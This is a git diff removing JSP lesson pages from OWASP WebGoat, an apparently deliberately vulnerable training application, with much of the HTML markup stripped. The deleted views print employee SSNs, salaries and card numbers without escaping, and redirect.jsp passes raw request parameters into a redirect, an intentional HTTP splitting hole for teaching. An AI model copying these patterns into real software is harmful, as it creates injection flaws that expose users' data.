- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- First Name: - - - - Last Name: - - -
- Street: - - - - City/State: - - -
- Phone: - - - - Start Date: - - -
- SSN: - - - - Salary: - - -
- Credit Card: - - - - Credit Card Limit: - - -
- Comments: - - - - Manager: - - -
- Disciplinary Explanation: - - - - Disciplinary Action Dates: - - -
-
-
- - - - - - - - -
- - - - - - - -
-
-
diff --git a/src/main/webapp/lessons/DBSQLInjection/ListStaff.jsp b/src/main/webapp/lessons/DBSQLInjection/ListStaff.jsp deleted file mode 100644 index 3691a8280..000000000 --- a/src/main/webapp/lessons/DBSQLInjection/ListStaff.jsp +++ /dev/null @@ -1,57 +0,0 @@ -<%@ page contentType="text/html; charset=ISO-8859-1" language="java" - import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBSQLInjection.DBSQLInjection" - errorPage="" %> -<% - WebSession webSession = ((WebSession)session.getAttribute("websession")); - int myUserId = webSession.getUserIdInLesson(); -%> -
Welcome Back <%=webSession.getUserNameInLesson()%> - Staff Listing Page
-
-
-
-

Select from the list below

- -
- - - - - -
-
-
- <% - if (webSession.isAuthorizedInLesson(myUserId, DBSQLInjection.CREATEPROFILE_ACTION)) - { - %> -
- <% - } - %> - <% - if (webSession.isAuthorizedInLesson(myUserId, DBSQLInjection.DELETEPROFILE_ACTION)) - { - %> -
- <% - } - %> -
- -
- -
- diff --git a/src/main/webapp/lessons/DBSQLInjection/Login.jsp b/src/main/webapp/lessons/DBSQLInjection/Login.jsp deleted file mode 100644 index 4807f7d9c..000000000 --- a/src/main/webapp/lessons/DBSQLInjection/Login.jsp +++ /dev/null @@ -1,32 +0,0 @@ -<%@ page contentType="text/html; charset=ISO-8859-1" language="java" - import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBSQLInjection.DBSQLInjection" - errorPage="" %> -
-
- <% - WebSession webSession = ((WebSession)session.getAttribute("websession")); - %> -
- -
- -
- -
-
-
\ No newline at end of file diff --git a/src/main/webapp/lessons/DBSQLInjection/SearchStaff.jsp b/src/main/webapp/lessons/DBSQLInjection/SearchStaff.jsp deleted file mode 100644 index 0c42a5a32..000000000 --- a/src/main/webapp/lessons/DBSQLInjection/SearchStaff.jsp +++ /dev/null @@ -1,22 +0,0 @@ -<%@ page contentType="text/html; charset=ISO-8859-1" language="java" - import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBSQLInjection.DBSQLInjection" - errorPage="" %> - \ No newline at end of file diff --git a/src/main/webapp/lessons/DBSQLInjection/ViewProfile.jsp b/src/main/webapp/lessons/DBSQLInjection/ViewProfile.jsp deleted file mode 100644 index bd9151a63..000000000 --- a/src/main/webapp/lessons/DBSQLInjection/ViewProfile.jsp +++ /dev/null @@ -1,154 +0,0 @@ -<%@ page contentType="text/html; charset=ISO-8859-1" language="java" - import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBSQLInjection.DBSQLInjection" - errorPage="" %> -<% - WebSession webSession = ((WebSession)session.getAttribute("websession")); - Employee employee = (Employee) session.getAttribute("DBSQLInjection." + DBSQLInjection.EMPLOYEE_ATTRIBUTE_KEY); -// int myUserId = getIntSessionAttribute(webSession, "DBSQLInjection." + DBSQLInjection.USER_ID); -%> -
Welcome Back <%=webSession.getUserNameInLesson()%>
-
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- First Name: - - <%=employee.getFirstName()%> - - Last Name: - - <%=employee.getLastName()%> -
- Street: - - <%=employee.getAddress1()%> - - City/State: - - <%=employee.getAddress2()%> -
- Phone: - - <%=employee.getPhoneNumber()%> - - Start Date: - - <%=employee.getStartDate()%> -
- SSN: - - <%=employee.getSsn()%> - - Salary: - - <%=employee.getSalary()%> -
- Credit Card: - - <%=employee.getCcn()%> - - Credit Card Limit: - - <%=employee.getCcnLimit()%> -
- Comments: - - <%=employee.getPersonalDescription()%> - - Manager: - - <%=employee.getManager()%> -
- Disciplinary Explanation: - - <%=employee.getDisciplinaryActionNotes()%> - - Disciplinary Action Dates: - - <%=employee.getDisciplinaryActionDate()%> -
-
-
- - - - - - - - -
- <% - if (webSession.isAuthorizedInLesson(webSession.getUserIdInLesson(), DBSQLInjection.LISTSTAFF_ACTION)) - { - %> -
- - -
- <% - } - %> -
- <% - if (webSession.isAuthorizedInLesson(webSession.getUserIdInLesson(), DBSQLInjection.EDITPROFILE_ACTION)) - { - %> -
- - -
- <% - } - %> -
- <% - if (webSession.isAuthorizedInLesson(webSession.getUserIdInLesson(), DBSQLInjection.DELETEPROFILE_ACTION)) - { - %> -
- - -
- <% - } - %> -
  -
- -
-
-
\ No newline at end of file diff --git a/src/main/webapp/lessons/DBSQLInjection/error.jsp b/src/main/webapp/lessons/DBSQLInjection/error.jsp deleted file mode 100644 index 5af0a45dc..000000000 --- a/src/main/webapp/lessons/DBSQLInjection/error.jsp +++ /dev/null @@ -1,3 +0,0 @@ -<%@ page contentType="text/html; charset=ISO-8859-1" language="java" - errorPage="" %> -


An error has occurred. diff --git a/src/main/webapp/lessons/DBSQLInjection/images/lesson1_SearchWindow.jpg b/src/main/webapp/lessons/DBSQLInjection/images/lesson1_SearchWindow.jpg deleted file mode 100644 index 39e1ed80d..000000000 Binary files a/src/main/webapp/lessons/DBSQLInjection/images/lesson1_SearchWindow.jpg and /dev/null differ diff --git a/src/main/webapp/lessons/DBSQLInjection/images/lesson1_header.jpg b/src/main/webapp/lessons/DBSQLInjection/images/lesson1_header.jpg deleted file mode 100644 index 60a809af0..000000000 Binary files a/src/main/webapp/lessons/DBSQLInjection/images/lesson1_header.jpg and /dev/null differ diff --git a/src/main/webapp/lessons/DBSQLInjection/images/lesson1_loginWindow.jpg b/src/main/webapp/lessons/DBSQLInjection/images/lesson1_loginWindow.jpg deleted file mode 100644 index c91f8a052..000000000 Binary files a/src/main/webapp/lessons/DBSQLInjection/images/lesson1_loginWindow.jpg and /dev/null differ diff --git a/src/main/webapp/lessons/DBSQLInjection/images/lesson1_menu.jpg b/src/main/webapp/lessons/DBSQLInjection/images/lesson1_menu.jpg deleted file mode 100644 index 2c9512571..000000000 Binary files a/src/main/webapp/lessons/DBSQLInjection/images/lesson1_menu.jpg and /dev/null differ diff --git a/src/main/webapp/lessons/DBSQLInjection/images/lesson1_workspace.jpg b/src/main/webapp/lessons/DBSQLInjection/images/lesson1_workspace.jpg deleted file mode 100644 index 292d25654..000000000 Binary files a/src/main/webapp/lessons/DBSQLInjection/images/lesson1_workspace.jpg and /dev/null differ diff --git a/src/main/webapp/lessons/General/redirect.jsp b/src/main/webapp/lessons/General/redirect.jsp deleted file mode 100644 index 41e9abef1..000000000 --- a/src/main/webapp/lessons/General/redirect.jsp +++ /dev/null 
@@ -1,16 +0,0 @@
-<%@ page language="java" contentType="text/html; charset=ISO-8859-1"
- pageEncoding="ISO-8859-1"%>
-
-
-
-
-HTTP Splitting
-
-
-<% response.sendRedirect(request.getContextPath() + "/attack?" +
- "Screen=" + request.getParameter("Screen") +
- "&menu=" + request.getParameter("menu") +
- "&fromRedirect=yes&language=" + request.getParameter("language"));
-%>
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/GoatHillsFinancial/EditProfile.jsp b/src/main/webapp/lessons/GoatHillsFinancial/EditProfile.jsp
deleted file mode 100644
index d486230e7..000000000
--- a/src/main/webapp/lessons/GoatHillsFinancial/EditProfile.jsp
+++ /dev/null
@@ -1,137 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial"
- errorPage="" %>
-<%
- WebSession webSession = ((WebSession)session.getAttribute("websession"));
- Employee employee = (Employee) session.getAttribute("GoatHillsFinancial.Employee");
-%>
-
Welcome Back <%=webSession.getUserNameInLesson()%> - Edit Profile Page
-
-
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- First Name: - - - - Last Name: - -
- Street: - - - - City/State: - - -
- Phone: - - - - Start Date: - - -
- SSN: - - - - Salary: - - -
- Credit Card: - - - - Credit Card Limit: - - -
- Comments: - - -
- Disciplinary Explanation: - - Disc. Date: - - -
- -
- Manager: - - -
-
-
- - - - - - - - -
- - - - - - - -
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/GoatHillsFinancial/GoatHillsFinancial.css b/src/main/webapp/lessons/GoatHillsFinancial/GoatHillsFinancial.css
deleted file mode 100644
index 61e93f63c..000000000
--- a/src/main/webapp/lessons/GoatHillsFinancial/GoatHillsFinancial.css
+++ /dev/null
@@ -1,14 +0,0 @@
-#lesson_wrapper {height: 435px;width: 500px;}
-#lesson_header {background-image: url(lessons/GoatHillsFinancial/images/lesson1_header.jpg);width: 490px;padding-right: 10px;padding-top: 60px;background-repeat: no-repeat;}
-.lesson_workspace {background-image: url(lessons/GoatHillsFinancial/images/lesson1_workspace.jpg);width: 489px;height: 325px;padding-left: 10px;padding-top: 10px;background-repeat: no-repeat;}
-.lesson_text {height: 240px;width: 460px;padding-top: 5px;}
-#lesson_buttons_bottom {height: 20px;width: 460px;}
-#lesson_b_b_left {width: 300px;float: left;}
-#lesson_b_b_right input {width: 100px;float: right;}
-.lesson_title_box {height: 20px;width: 420px;padding-left: 30px;}
-.lesson_workspace { }
-.lesson_txt_10 {font-family: Arial, Helvetica, sans-serif;font-size: 10px;}
-.lesson_text_db {color: #0066FF}
-#lesson_login {background-image: url(lessons/GoatHillsFinancial/images/lesson1_loginWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}
-#lesson_login_txt {font-family: Arial, Helvetica, sans-serif;font-size: 12px;text-align: center;}
-#lesson_search {background-image: url(lessons/GoatHillsFinancial/images/lesson1_SearchWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}
diff --git a/src/main/webapp/lessons/GoatHillsFinancial/GoatHillsFinancial.jsp b/src/main/webapp/lessons/GoatHillsFinancial/GoatHillsFinancial.jsp
deleted file mode 100644
index 90dbef989..000000000
--- a/src/main/webapp/lessons/GoatHillsFinancial/GoatHillsFinancial.jsp
+++ /dev/null
@@ -1,30 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="org.owasp.webgoat.session.*"
- errorPage="" %>
-<%@page import="org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;"%>
-
-<%
-WebSession webSession = ((WebSession)session.getAttribute("websession"));
-System.out.println("WebSession is " + webSession);
-GoatHillsFinancial currentLesson = (GoatHillsFinancial) webSession.getCurrentLesson();
-System.out.println("CurrentLesson = " + currentLesson);
-%>
-
-
-
- <% - String subViewPage = currentLesson.getPage(webSession); - System.out.println("SubViewPage is " + subViewPage); - if (subViewPage != null) - { - //System.out.println("Including sub view page: " + subViewPage); - %> - - <% - } - %> - -
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/GoatHillsFinancial/ListStaff.jsp b/src/main/webapp/lessons/GoatHillsFinancial/ListStaff.jsp
deleted file mode 100644
index 40e78abb0..000000000
--- a/src/main/webapp/lessons/GoatHillsFinancial/ListStaff.jsp
+++ /dev/null
@@ -1,57 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial"
- errorPage="" %>
-<%
- WebSession webSession = ((WebSession)session.getAttribute("websession"));
- int myUserId = webSession.getUserIdInLesson();
-%>
-
Welcome Back <%=webSession.getUserNameInLesson()%> - Staff Listing Page
-
-
-
-

Select from the list below

- -
- - - - - -
-
-
- <% - if (webSession.isAuthorizedInLesson(myUserId, GoatHillsFinancial.CREATEPROFILE_ACTION)) - { - %> -
- <% - } - %> - <% - if (webSession.isAuthorizedInLesson(myUserId, GoatHillsFinancial.DELETEPROFILE_ACTION)) - { - %> -
- <% - } - %> -
- -
- -
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/GoatHillsFinancial/Login.jsp b/src/main/webapp/lessons/GoatHillsFinancial/Login.jsp
deleted file mode 100644
index 9e13040cd..000000000
--- a/src/main/webapp/lessons/GoatHillsFinancial/Login.jsp
+++ /dev/null
@@ -1,32 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial"
- errorPage="" %>
-
-
- <% - WebSession webSession = ((WebSession)session.getAttribute("websession")); - %> -
- -
- -
- -
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/GoatHillsFinancial/SearchStaff.jsp b/src/main/webapp/lessons/GoatHillsFinancial/SearchStaff.jsp
deleted file mode 100644
index 611a826fd..000000000
--- a/src/main/webapp/lessons/GoatHillsFinancial/SearchStaff.jsp
+++ /dev/null
@@ -1,22 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial"
- errorPage="" %>
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/GoatHillsFinancial/ViewProfile.jsp b/src/main/webapp/lessons/GoatHillsFinancial/ViewProfile.jsp
deleted file mode 100644
index a03d60a07..000000000
--- a/src/main/webapp/lessons/GoatHillsFinancial/ViewProfile.jsp
+++ /dev/null
@@ -1,157 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial"
- errorPage="" %>
-<%
- Employee employee = (Employee) session.getAttribute("GoatHillsFinancial." + GoatHillsFinancial.EMPLOYEE_ATTRIBUTE_KEY);
- WebSession webSession = ((WebSession)session.getAttribute("websession"));
-// int myUserId = getIntSessionAttribute(webSession, "GoatHillsFinancial." + GoatHillsFinancial.USER_ID);
-%>
-
Welcome Back <%=webSession.getUserNameInLesson()%> - View Profile Page
-
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- First Name: - - <%=employee.getFirstName()%> - - Last Name: - - <%=employee.getLastName()%> -
- Street: - - <%=employee.getAddress1()%> - - City/State: - - <%=employee.getAddress2()%> -
- Phone: - - <%=employee.getPhoneNumber()%> - - Start Date: - - <%=employee.getStartDate()%> -
- SSN: - - <%=employee.getSsn()%> - - Salary: - - <%=employee.getSalary()%> -
- Credit Card: - - <%=employee.getCcn()%> - - Credit Card Limit: - - <%=employee.getCcnLimit()%> -
- Comments: - - <%=employee.getPersonalDescription()%> -
- Disciplinary Explanation: - - Disc. Dates: - - <%=employee.getDisciplinaryActionDate()%> -
- <%=employee.getDisciplinaryActionNotes()%> -
- Manager: - - <%=employee.getManager()%> -
-
-
- - - - - - - - -
- <% - if (webSession.isAuthorizedInLesson(webSession.getUserIdInLesson(), GoatHillsFinancial.LISTSTAFF_ACTION)) - { - %> -
- - -
- <% - }%> -
- <% - if (webSession.isAuthorizedInLesson(webSession.getUserIdInLesson(), GoatHillsFinancial.EDITPROFILE_ACTION)) - { - %> -
- - -
- <% - } - %> -
- <% - if (webSession.isAuthorizedInLesson(webSession.getUserIdInLesson(), GoatHillsFinancial.DELETEPROFILE_ACTION)) - { - %> -
- - -
- <% - } - %> -
  -
- -
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/GoatHillsFinancial/error.jsp b/src/main/webapp/lessons/GoatHillsFinancial/error.jsp
deleted file mode 100644
index fdffa05ab..000000000
--- a/src/main/webapp/lessons/GoatHillsFinancial/error.jsp
+++ /dev/null
@@ -1,13 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial"
- errorPage="" %>
-<%
- WebSession webSession = ((WebSession)session.getAttribute(WebSession.SESSION));
-// int myUserId = getIntSessionAttribute(webSession, "GoatHillsFinancial." + GoatHillsFinancial.USER_ID);
-%>
-


An error has occurred. -


-
- - -
\ No newline at end of file
diff --git a/src/main/webapp/lessons/GoatHillsFinancial/images/accessControl.jpg b/src/main/webapp/lessons/GoatHillsFinancial/images/accessControl.jpg
deleted file mode 100644
index e9af72c50..000000000
Binary files a/src/main/webapp/lessons/GoatHillsFinancial/images/accessControl.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/GoatHillsFinancial/images/dbSchema.jpg b/src/main/webapp/lessons/GoatHillsFinancial/images/dbSchema.jpg
deleted file mode 100644
index 457b634d0..000000000
Binary files a/src/main/webapp/lessons/GoatHillsFinancial/images/dbSchema.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/GoatHillsFinancial/images/lesson1_SearchWindow.jpg b/src/main/webapp/lessons/GoatHillsFinancial/images/lesson1_SearchWindow.jpg
deleted file mode 100644
index 39e1ed80d..000000000
Binary files a/src/main/webapp/lessons/GoatHillsFinancial/images/lesson1_SearchWindow.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/GoatHillsFinancial/images/lesson1_header.jpg b/src/main/webapp/lessons/GoatHillsFinancial/images/lesson1_header.jpg
deleted file mode 100644
index 60a809af0..000000000
Binary files a/src/main/webapp/lessons/GoatHillsFinancial/images/lesson1_header.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/GoatHillsFinancial/images/lesson1_loginWindow.jpg b/src/main/webapp/lessons/GoatHillsFinancial/images/lesson1_loginWindow.jpg
deleted file mode 100644
index c91f8a052..000000000
Binary files a/src/main/webapp/lessons/GoatHillsFinancial/images/lesson1_loginWindow.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/GoatHillsFinancial/images/lesson1_menu.jpg b/src/main/webapp/lessons/GoatHillsFinancial/images/lesson1_menu.jpg
deleted file mode 100644
index 2c9512571..000000000
Binary files a/src/main/webapp/lessons/GoatHillsFinancial/images/lesson1_menu.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/GoatHillsFinancial/images/lesson1_workspace.jpg b/src/main/webapp/lessons/GoatHillsFinancial/images/lesson1_workspace.jpg
deleted file mode 100644
index 292d25654..000000000
Binary files a/src/main/webapp/lessons/GoatHillsFinancial/images/lesson1_workspace.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/GoatHillsFinancial/images/orgChart.jpg b/src/main/webapp/lessons/GoatHillsFinancial/images/orgChart.jpg
deleted file mode 100644
index 016c0d162..000000000
Binary files a/src/main/webapp/lessons/GoatHillsFinancial/images/orgChart.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/RoleBasedAccessControl/EditProfile.jsp b/src/main/webapp/lessons/RoleBasedAccessControl/EditProfile.jsp
deleted file mode 100644
index 467c53f04..000000000
--- a/src/main/webapp/lessons/RoleBasedAccessControl/EditProfile.jsp
+++ /dev/null
@@ -1,137 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl"
- errorPage="" %>
-<%
- WebSession webSession = ((WebSession)session.getAttribute("websession"));
- Employee employee = (Employee) session.getAttribute("RoleBasedAccessControl.Employee");
-%>
-
Welcome Back <%=webSession.getUserNameInLesson()%> - Edit Profile Page
-
-
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- First Name: - - - - Last Name: - -
- Street: - - - - City/State: - - -
- Phone: - - - - Start Date: - - -
- SSN: - - - - Salary: - - -
- Credit Card: - - - - Credit Card Limit: - - -
- Comments: - - -
- Disciplinary Explanation: - - Disc. Date: - - -
- -
- Manager: - - -
-
-
- - - - - - - - -
- - - - - - - -
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/RoleBasedAccessControl/ListStaff.jsp b/src/main/webapp/lessons/RoleBasedAccessControl/ListStaff.jsp
deleted file mode 100644
index 16e976851..000000000
--- a/src/main/webapp/lessons/RoleBasedAccessControl/ListStaff.jsp
+++ /dev/null
@@ -1,57 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl"
- errorPage="" %>
-<%
- WebSession webSession = ((WebSession)session.getAttribute("websession"));
- int myUserId = webSession.getUserIdInLesson();
-%>
-
Welcome Back <%=webSession.getUserNameInLesson()%> - Staff Listing Page
-
-
-
-

Select from the list below

- -
- - - - - -
-
-
- <% - if (webSession.isAuthorizedInLesson(myUserId, RoleBasedAccessControl.CREATEPROFILE_ACTION)) - { - %> -
- <% - } - %> - <% - if (webSession.isAuthorizedInLesson(myUserId, RoleBasedAccessControl.DELETEPROFILE_ACTION)) - { - %> -
- <% - } - %> -
- -
- -
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/RoleBasedAccessControl/Login.jsp b/src/main/webapp/lessons/RoleBasedAccessControl/Login.jsp
deleted file mode 100644
index 6e97a55e5..000000000
--- a/src/main/webapp/lessons/RoleBasedAccessControl/Login.jsp
+++ /dev/null
@@ -1,32 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl"
- errorPage="" %>
-
-
- <% - WebSession webSession = ((WebSession)session.getAttribute("websession")); - %> -
- -
- -
- -
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/RoleBasedAccessControl/RoleBasedAccessControl.css b/src/main/webapp/lessons/RoleBasedAccessControl/RoleBasedAccessControl.css
deleted file mode 100644
index f38977fcf..000000000
--- a/src/main/webapp/lessons/RoleBasedAccessControl/RoleBasedAccessControl.css
+++ /dev/null
@@ -1,14 +0,0 @@
-#lesson_wrapper {height: 435px;width: 500px;}
-#lesson_header {background-image: url(lessons/RoleBasedAccessControl/images/lesson1_header.jpg);width: 490px;padding-right: 10px;padding-top: 60px;background-repeat: no-repeat;}
-.lesson_workspace {background-image: url(lessons/RoleBasedAccessControl/images/lesson1_workspace.jpg);width: 489px;height: 325px;padding-left: 10px;padding-top: 10px;background-repeat: no-repeat;}
-.lesson_text {height: 240px;width: 460px;padding-top: 5px;}
-#lesson_buttons_bottom {height: 20px;width: 460px;}
-#lesson_b_b_left {width: 300px;float: left;}
-#lesson_b_b_right input {width: 100px;float: right;}
-.lesson_title_box {height: 20px;width: 420px;padding-left: 30px;}
-.lesson_workspace { }
-.lesson_txt_10 {font-family: Arial, Helvetica, sans-serif;font-size: 10px;}
-.lesson_text_db {color: #0066FF}
-#lesson_login {background-image: url(lessons/RoleBasedAccessControl/images/lesson1_loginWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}
-#lesson_login_txt {font-family: Arial, Helvetica, sans-serif;font-size: 12px;text-align: center;}
-#lesson_search {background-image: url(lessons/RoleBasedAccessControl/images/lesson1_SearchWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}
diff --git a/src/main/webapp/lessons/RoleBasedAccessControl/RoleBasedAccessControl.jsp b/src/main/webapp/lessons/RoleBasedAccessControl/RoleBasedAccessControl.jsp
deleted file mode 100644
index 7afc1c789..000000000
--- a/src/main/webapp/lessons/RoleBasedAccessControl/RoleBasedAccessControl.jsp
+++ /dev/null
@@ -1,26 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl"
- errorPage="" %>
-
-<%
-WebSession webSession = ((WebSession)session.getAttribute("websession"));
-RoleBasedAccessControl currentLesson = (RoleBasedAccessControl) webSession.getCurrentLesson();
-%>
-
-
-
- <% - String subViewPage = currentLesson.getPage(webSession); - if (subViewPage != null) - { - //System.out.println("Including sub view page: " + subViewPage); - %> - - <% - } - %> - -
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/RoleBasedAccessControl/SearchStaff.jsp b/src/main/webapp/lessons/RoleBasedAccessControl/SearchStaff.jsp
deleted file mode 100644
index a9a9f3af2..000000000
--- a/src/main/webapp/lessons/RoleBasedAccessControl/SearchStaff.jsp
+++ /dev/null
@@ -1,22 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl"
- errorPage="" %>
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/RoleBasedAccessControl/ViewProfile.jsp b/src/main/webapp/lessons/RoleBasedAccessControl/ViewProfile.jsp
deleted file mode 100644
index 3e56dd73e..000000000
--- a/src/main/webapp/lessons/RoleBasedAccessControl/ViewProfile.jsp
+++ /dev/null
@@ -1,157 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl"
- errorPage="" %>
-<%
- Employee employee = (Employee) session.getAttribute("RoleBasedAccessControl." + RoleBasedAccessControl.EMPLOYEE_ATTRIBUTE_KEY);
- WebSession webSession = ((WebSession)session.getAttribute("websession"));
-// int myUserId = getIntSessionAttribute(webSession, "RoleBasedAccessControl." + RoleBasedAccessControl.USER_ID);
-%>
-
Welcome Back <%=webSession.getUserNameInLesson()%> - View Profile Page
-
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- First Name: - - <%=employee.getFirstName()%> - - Last Name: - - <%=employee.getLastName()%> -
- Street: - - <%=employee.getAddress1()%> - - City/State: - - <%=employee.getAddress2()%> -
- Phone: - - <%=employee.getPhoneNumber()%> - - Start Date: - - <%=employee.getStartDate()%> -
- SSN: - - <%=employee.getSsn()%> - - Salary: - - <%=employee.getSalary()%> -
- Credit Card: - - <%=employee.getCcn()%> - - Credit Card Limit: - - <%=employee.getCcnLimit()%> -
- Comments: - - <%=employee.getPersonalDescription()%> -
- Disciplinary Explanation: - - Disc. Dates: - - <%=employee.getDisciplinaryActionDate()%> -
- <%=employee.getDisciplinaryActionNotes()%> -
- Manager: - - <%=employee.getManager()%> -
-
-
- - - - - - - - -
- <% - if (webSession.isAuthorizedInLesson(webSession.getUserIdInLesson(), RoleBasedAccessControl.LISTSTAFF_ACTION)) - { - %> -
- - -
- <% - }%> -
- <% - if (webSession.isAuthorizedInLesson(webSession.getUserIdInLesson(), RoleBasedAccessControl.EDITPROFILE_ACTION)) - { - %> -
- - -
- <% - } - %> -
- <% - if (webSession.isAuthorizedInLesson(webSession.getUserIdInLesson(), RoleBasedAccessControl.DELETEPROFILE_ACTION)) - { - %> -
- - -
- <% - } - %> -
  -
- -
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/RoleBasedAccessControl/error.jsp b/src/main/webapp/lessons/RoleBasedAccessControl/error.jsp
deleted file mode 100644
index 419740ee7..000000000
--- a/src/main/webapp/lessons/RoleBasedAccessControl/error.jsp
+++ /dev/null
@@ -1,13 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl"
- errorPage="" %>
-<%
- WebSession webSession = ((WebSession)session.getAttribute("websession"));
-// int myUserId = getIntSessionAttribute(webSession, "RoleBasedAccessControl." + RoleBasedAccessControl.USER_ID);
-%>
-


An error has occurred. -


-
- - -
\ No newline at end of file
diff --git a/src/main/webapp/lessons/RoleBasedAccessControl/images/accessControl.jpg b/src/main/webapp/lessons/RoleBasedAccessControl/images/accessControl.jpg
deleted file mode 100644
index e9af72c50..000000000
Binary files a/src/main/webapp/lessons/RoleBasedAccessControl/images/accessControl.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/RoleBasedAccessControl/images/dbSchema.jpg b/src/main/webapp/lessons/RoleBasedAccessControl/images/dbSchema.jpg
deleted file mode 100644
index 457b634d0..000000000
Binary files a/src/main/webapp/lessons/RoleBasedAccessControl/images/dbSchema.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/RoleBasedAccessControl/images/lesson1_SearchWindow.jpg b/src/main/webapp/lessons/RoleBasedAccessControl/images/lesson1_SearchWindow.jpg
deleted file mode 100644
index 39e1ed80d..000000000
Binary files a/src/main/webapp/lessons/RoleBasedAccessControl/images/lesson1_SearchWindow.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/RoleBasedAccessControl/images/lesson1_header.jpg b/src/main/webapp/lessons/RoleBasedAccessControl/images/lesson1_header.jpg
deleted file mode 100644
index 60a809af0..000000000
Binary files a/src/main/webapp/lessons/RoleBasedAccessControl/images/lesson1_header.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/RoleBasedAccessControl/images/lesson1_loginWindow.jpg b/src/main/webapp/lessons/RoleBasedAccessControl/images/lesson1_loginWindow.jpg
deleted file mode 100644
index c91f8a052..000000000
Binary files a/src/main/webapp/lessons/RoleBasedAccessControl/images/lesson1_loginWindow.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/RoleBasedAccessControl/images/lesson1_menu.jpg b/src/main/webapp/lessons/RoleBasedAccessControl/images/lesson1_menu.jpg
deleted file mode 100644
index 2c9512571..000000000
Binary files a/src/main/webapp/lessons/RoleBasedAccessControl/images/lesson1_menu.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/RoleBasedAccessControl/images/lesson1_workspace.jpg b/src/main/webapp/lessons/RoleBasedAccessControl/images/lesson1_workspace.jpg
